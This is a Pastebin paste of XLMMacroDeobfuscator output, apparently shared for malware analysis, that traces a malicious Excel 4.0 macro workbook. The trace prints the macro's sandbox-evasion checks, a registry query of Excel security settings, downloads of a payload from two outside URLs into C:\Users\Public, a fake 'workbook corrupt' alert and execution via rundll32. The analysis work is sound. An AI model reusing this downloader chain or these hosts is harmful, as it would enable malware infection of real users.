API tools faq
paste
Advertisement
dissectmalware

323455169b75e4a753eb5ad34290243ede09f9d559545aac6e6a71c2719b

dissectmalware
May 26th, 2020
335
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.87 KB | None | 0 0
raw download clone embed print report
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\323455169b75e4a753eb5ad34290243ede09f9d559545aac6e6a71c2719b98de.xls
  22.  
  23. [Loading Cells]
  24. auto_open: auto_open->Sheet2!$FA$7876
  25. [Starting Deobfuscation]
  26. CELL:FA7876 , FullEvaluation , SET.VALUE(BJ25299,255.6)
  27. CELL:FA7877 , FullEvaluation , GOTO(BQ45566)
  28. CELL:BQ45566 , FullEvaluation , SET.VALUE(CD53037,-389)
  29. CELL:BQ45567 , FullEvaluation , RUN(Sheet2!HD64832)
  30. CELL:HD64832 , FullEvaluation , SET.VALUE(FZ5258,65.25)
  31. CELL:HD64833 , FullEvaluation , RUN(Sheet2!ES3436)
  32. CELL:ES3436 , FullEvaluation , SET.VALUE(AE45948,-251)
  33. CELL:ES3437 , FullEvaluation , GOTO(GS20666)
  34. CELL:GS20666 , FullEvaluation , SET.VALUE(CR53465,-199)
  35. CELL:GS20667 , FullEvaluation , GOTO(DF5689)
  36. CELL:DF5689 , FullEvaluation , SET.VALUE(R15778,102.75)
  37. CELL:DF5690 , FullEvaluation , GOTO(DL39613)
  38. CELL:DL39613 , FullEvaluation , SET.VALUE(GM16462,-969.75)
  39. CELL:DL39614 , FullEvaluation , GOTO(HM27262)
  40. CELL:HM27262 , FullEvaluation , SET.VALUE(IN13413,1203.8)
  41. CELL:HM27263 , FullEvaluation , RUN(Sheet2!IJ30961)
  42. CELL:IJ30961 , FullEvaluation , SET.VALUE(DG47804,-494)
  43. CELL:IJ30962 , FullEvaluation , RUN(Sheet2!AL57983)
  44. CELL:AL57983 , FullEvaluation , SET.VALUE(BG47080,35)
  45. CELL:AL57984 , FullEvaluation , GOTO(HN49209)
  46. CELL:HN49209 , FullEvaluation , FORMULA("=CLOSE(FALSE)",FE5114)
  47. CELL:HN49210 , FullEvaluation , RUN(Sheet2!EG28967)
  48. CELL:EG28967 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",EG28968)
  49. CELL:EG28968 , PartialEvaluation , APP.MAXIMIZE()
  50. CELL:EG28969 , FullEvaluation , RUN(Sheet2!DT45019)
  51. CELL:DT45019 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[-39906]C[37]),)",DT45020)
  52. CELL:DT45020 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[-39906]C[37]),)
  53. CELL:DT45021 , FullEvaluation , GOTO(U26012)
  54. CELL:U26012 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-20899]C[140]))",U26013)
  55. CELL:U26013 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-20899]C[140]))
  56. CELL:U26014 , FullEvaluation , RUN(Sheet2!IO19668)
  57. CELL:IO19668 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-14555]C[-88]),)",IO19669)
  58. CELL:IO19669 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-14555]C[-88]),)
  59. CELL:IO19670 , FullEvaluation , GOTO(FG59760)
  60. CELL:FG59760 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[-54647]C[-2]),)",FG59761)
  61. CELL:FG59761 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-54647]C[-2]),)
  62. CELL:FG59762 , FullEvaluation , RUN(Sheet2!HC57286)
  63. CELL:HC57286 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-52173]C[-50]),)",HC57287)
  64. CELL:HC57287 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[-52173]C[-50]),)
  65. CELL:HC57288 , FullEvaluation , RUN(Sheet2!FG13805)
  66. CELL:FG13805 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-8692]C[-2]),)",FG13806)
  67. CELL:FG13806 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-8692]C[-2]),)
  68. CELL:FG13807 , FullEvaluation , GOTO(HS5509)
  69. CELL:HS5509 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-396]C[-66]))",HS5510)
  70. CELL:HS5510 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-396]C[-66]))
  71. CELL:HS5511 , FullEvaluation , RUN(Sheet2!AQ38016)
  72. CELL:AQ38016 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-32903]C[118]))",AQ38017)
  73. CELL:AQ38017 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-32903]C[118]))
  74. CELL:AQ38018 , FullEvaluation , GOTO(CR63589)
  75. CELL:CR63589 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-58476]C[65]))",CR63590)
  76. CELL:CR63590 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-58476]C[65]))
  77. CELL:CR63590 , FullEvaluation , [TRUE]
  78. CELL:CR63591 , FullEvaluation , RUN(Sheet2!DR7029)
  79. CELL:DR7029 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",FG17853)
  80. CELL:DR7030 , FullEvaluation , GOTO(GU6960)
  81. CELL:GU6960 , FullEvaluation , FORMULA("=""C:\Users\Public\WMNyoI.reg""",AK62260)
  82. CELL:GU6961 , FullEvaluation , RUN(Sheet2!EF33676)
  83. CELL:EF33676 , FullEvaluation , FORMULA("=R[-33458]C[47]&GET.WORKSPACE(2)&""\Excel\Security ""&R[10949]C[-79]&"" /y""",DL51311)
  84. CELL:EF33677 , FullEvaluation , RUN(Sheet2!FX41133)
  85. CELL:FX41133 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",AZ24506)
  86. CELL:FX41134 , FullEvaluation , RUN(Sheet2!HN11697)
  87. CELL:HN11697 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[12808]C[-170],R[39613]C[-106],0,5)",HN11698)
  88. CELL:HN11698 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","=""C:\Windows\system32\reg.exe""","=R[-33458]C[47]&GET.WORKSPACE(2)&""\Excel\Security ""&R[10949]C[-79]&"" /y""",0,5)
  89. CELL:HN11699 , FullEvaluation , GOTO(FZ14642)
  90. CELL:FZ14642 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[47615]C[-145])))",FZ14645)
  91. CELL:FZ14643 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",FZ14646)
  92. CELL:FZ14644 , FullEvaluation , FORMULA("=NEXT()",FZ14647)
  93. CELL:FZ14645 , PartialEvaluation , WHILE(ISERROR(FILES(R[47615]C[-145])))
  94. CELL:FZ14648 , FullEvaluation , GOTO(CA23395)
  95. CELL:CA23395 , FullEvaluation , FORMULA("=FOPEN(R[38864]C[-42])",CA23396)
  96. CELL:CA23396 , PartialEvaluation , FOPEN("=""C:\Users\Public\WMNyoI.reg""")
  97. CELL:CA23397 , FullEvaluation , GOTO(GX30764)
  98. CELL:GX30764 , FullEvaluation , FORMULA("=FPOS(R[-7369]C[-127],215)",GX30765)
  99. CELL:GX30765 , PartialEvaluation , FPOS("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")",215)
  100. CELL:GX30766 , FullEvaluation , RUN(Sheet2!DY20468)
  101. CELL:DY20468 , FullEvaluation , FORMULA("=FREAD(R[2927]C[-50],255)",DY20469)
  102. CELL:DY20469 , PartialEvaluation , FREAD("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")",255)
  103. CELL:DY20470 , FullEvaluation , RUN(Sheet2!EJ44420)
  104. CELL:EJ44420 , FullEvaluation , FORMULA("=FCLOSE(R[-21025]C[-61])",EJ44421)
  105. CELL:EJ44421 , PartialEvaluation , FCLOSE("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")")
  106. CELL:EJ44422 , FullEvaluation , RUN(Sheet2!DE35862)
  107. CELL:DE35862 , FullEvaluation , FORMULA("=FILE.DELETE(R[26397]C[-72])",DE35863)
  108. CELL:DE35863 , PartialEvaluation , FILE.DELETE("=""C:\Users\Public\WMNyoI.reg""")
  109. CELL:DE35864 , FullEvaluation , RUN(Sheet2!EW6206)
  110. CELL:EW6206 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[14262]C[-24])),GOTO(R[-1093]C[8]),)",EW6207)
  111. CELL:EW6207 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[14262]C[-24])),GOTO(R[-1093]C[8]),)
  112. CELL:EW6207 , FullEvaluation , [TRUE] GOTO(R[-1093]C[8])
  113. CELL:FE5114 , End , CLOSE(FALSE)
  114. CELL:EW6207 , FullEvaluation , [FALSE]
  115. CELL:EW6208 , FullEvaluation , RUN(Sheet2!HG37600)
  116. CELL:HG37600 , FullEvaluation , FORMULA("=""C:\Users\Public\CcWcaZEP.html""",AG4058)
  117. CELL:HG37601 , FullEvaluation , GOTO(BG7958)
  118. CELL:BG7958 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",GK20094)
  119. CELL:BG7959 , FullEvaluation , GOTO(FT2763)
  120. CELL:FT2763 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[17330]C[17],R[1294]C[-143],0,0)",FT2764)
  121. CELL:FT2764 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","=""C:\Users\Public\CcWcaZEP.html""",0,0)
  122. CELL:FT2765 , FullEvaluation , GOTO(GS14934)
  123. CELL:GS14934 , FullEvaluation , FORMULA("=FILES(R[-10877]C[-168])",GS14935)
  124. CELL:GS14935 , PartialEvaluation , FILES("=""C:\Users\Public\CcWcaZEP.html""")
  125. CELL:GS14936 , FullEvaluation , RUN(Sheet2!IB64512)
  126. CELL:IB64512 , FullEvaluation , FORMULA("=IF(ISERROR(R[-49578]C[-35]),GOTO(R[-59399]C[-75]),)",IB64513)
  127. CELL:IB64513 , FullBranching , IF(ISERROR(R[-49578]C[-35]),GOTO(R[-59399]C[-75]),)
  128. CELL:IB64513 , FullEvaluation , [TRUE] GOTO(R[-59399]C[-75])
  129. CELL:FE5114 , End , CLOSE(FALSE)
  130. CELL:IB64513 , FullEvaluation , [FALSE]
  131. CELL:IB64514 , FullEvaluation , GOTO(FW47055)
  132. CELL:FW47055 , FullEvaluation , SET.VALUE(IU65323,-97.5)
  133. CELL:FW47056 , FullEvaluation , GOTO(GT51876)
  134. CELL:GT51876 , FullEvaluation , SET.VALUE(BH45074,247)
  135. CELL:GT51877 , FullEvaluation , GOTO(AY22925)
  136. CELL:AY22925 , FullEvaluation , SET.VALUE(GC44684,329)
  137. CELL:AY22926 , FullEvaluation , RUN(Sheet2!EQ17120)
  138. CELL:EQ17120 , FullEvaluation , SET.VALUE(BZ59600,376)
  139. CELL:EQ17121 , FullEvaluation , RUN(Sheet2!CI60554)
  140. CELL:CI60554 , FullEvaluation , SET.VALUE(IJ21467,-846)
  141. CELL:CI60555 , FullEvaluation , GOTO(CP30159)
  142. CELL:CP30159 , FullEvaluation , SET.VALUE(AP50057,0.9)
  143. CELL:CP30160 , FullEvaluation , GOTO(AD49613)
  144. CELL:AD49613 , FullEvaluation , SET.VALUE(AT21980,-357.6)
  145. CELL:AD49614 , FullEvaluation , RUN(Sheet2!IG12751)
  146. CELL:IG12751 , FullEvaluation , SET.VALUE(EO40560,172)
  147. CELL:IG12752 , FullEvaluation , GOTO(GC38983)
  148. CELL:GC38983 , FullEvaluation , SET.VALUE(BU61267,476)
  149. CELL:GC38984 , FullEvaluation , GOTO(DH39742)
  150. CELL:DH39742 , FullEvaluation , SET.VALUE(HY9156,406)
  151. CELL:DH39743 , FullEvaluation , GOTO(DN42978)
  152. CELL:DN42978 , FullEvaluation , FORMULA("=""C:\Users\Public\kf1o.html""",FP15812)
  153. CELL:DN42979 , FullEvaluation , GOTO(EB3725)
  154. CELL:EB3725 , FullEvaluation , FORMULA("=""https://dehabadi.ir/wp-keys.php""",EN4797)
  155. CELL:EB3726 , FullEvaluation , RUN(Sheet2!AX38305)
  156. CELL:AX38305 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[4751]C[5],R[15766]C[33],0,0)",EI46)
  157. CELL:AX38306 , FullEvaluation , GOTO(BB30)
  158. CELL:BB30 , FullEvaluation , FORMULA("=FILES(R[-34907]C[50])",DR50719)
  159. CELL:BB31 , FullEvaluation , GOTO(CN53095)
  160. CELL:CN53095 , FullEvaluation , FORMULA("=IF(ISERROR(R[16690]C[104]),,RUN(R[-31106]C[26]))",R34029)
  161. CELL:CN53096 , FullEvaluation , GOTO(HD9075)
  162. CELL:HD9075 , FullEvaluation , FORMULA("=""https://eleventalents.com/wp-keys.php""",AB61478)
  163. CELL:HD9076 , FullEvaluation , RUN(Sheet2!GE52633)
  164. CELL:GE52633 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[8035]C[-199],R[-37631]C[-55],0,0)",HS53443)
  165. CELL:GE52634 , FullEvaluation , RUN(Sheet2!E6760)
  166. CELL:E6760 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",DD49036)
  167. CELL:E6761 , FullEvaluation , GOTO(DK19379)
  168. CELL:DK19379 , FullEvaluation , FORMULA("=ALERT(R[46113]C[64])",AR2923)
  169. CELL:DK19380 , FullEvaluation , RUN(Sheet2!GR22181)
  170. CELL:GR22181 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",DU54329)
  171. CELL:GR22182 , FullEvaluation , GOTO(GZ25335)
  172. CELL:GZ25335 , FullEvaluation , FORMULA("=R[-29869]C[-79]&"",DllRegisterServer""",IQ45681)
  173. CELL:GZ25336 , FullEvaluation , GOTO(AI4480)
  174. CELL:AI4480 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[50025]C[-13],R[41377]C[113],0,5)",EH4304)
  175. CELL:AI4481 , FullEvaluation , GOTO(EI46)
  176. CELL:EI46 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"=""https://dehabadi.ir/wp-keys.php""","=""C:\Users\Public\kf1o.html""",0,0)
  177. CELL:EI47 , FullEvaluation , RUN(Sheet2!DR50719)
  178. CELL:DR50719 , PartialEvaluation , FILES("=""C:\Users\Public\kf1o.html""")
  179. CELL:DR50720 , FullEvaluation , GOTO(R34029)
  180. CELL:R34029 , FullBranching , IF(ISERROR(R[16690]C[104]),,RUN(R[-31106]C[26]))
  181. CELL:R34029 , FullEvaluation , [TRUE]
  182. CELL:R34030 , FullEvaluation , GOTO(AB61478)
  183. CELL:AB61478 , FullEvaluation , "https://eleventalents.com/wp-keys.php"
  184. CELL:AB61479 , FullEvaluation , RUN(Sheet2!HS53443)
  185. CELL:HS53443 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://eleventalents.com/wp-keys.php","=""C:\Users\Public\kf1o.html""",0,0)
  186. CELL:HS53444 , FullEvaluation , RUN(Sheet2!DD49036)
  187. CELL:DD49036 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  188. CELL:DD49037 , FullEvaluation , GOTO(AR2923)
  189. CELL:AR2923 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  190. CELL:AR2924 , FullEvaluation , GOTO(DU54329)
  191. CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  192. CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
  193. CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
  194. CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
  195. CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
  196. CELL:EH4305 , FullEvaluation , GOTO(FE5114)
  197. CELL:FE5114 , End , CLOSE(FALSE)
  198. CELL:R34029 , FullEvaluation , [FALSE] RUN(Sheet2!AR2923)
  199. CELL:AR2923 , PartialEvaluation , ALERT("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  200. CELL:AR2924 , FullEvaluation , GOTO(DU54329)
  201. CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  202. CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
  203. CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
  204. CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
  205. CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
  206. CELL:EH4305 , FullEvaluation , GOTO(FE5114)
  207. CELL:FE5114 , End , CLOSE(FALSE)
  208. CELL:CR63590 , FullEvaluation , [FALSE] GOTO(R[-58476]C[65])
  209. CELL:FE5114 , End , CLOSE(FALSE)
  210. [END of Deobfuscation]
  211. time elapsed: 9.589247465133667
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!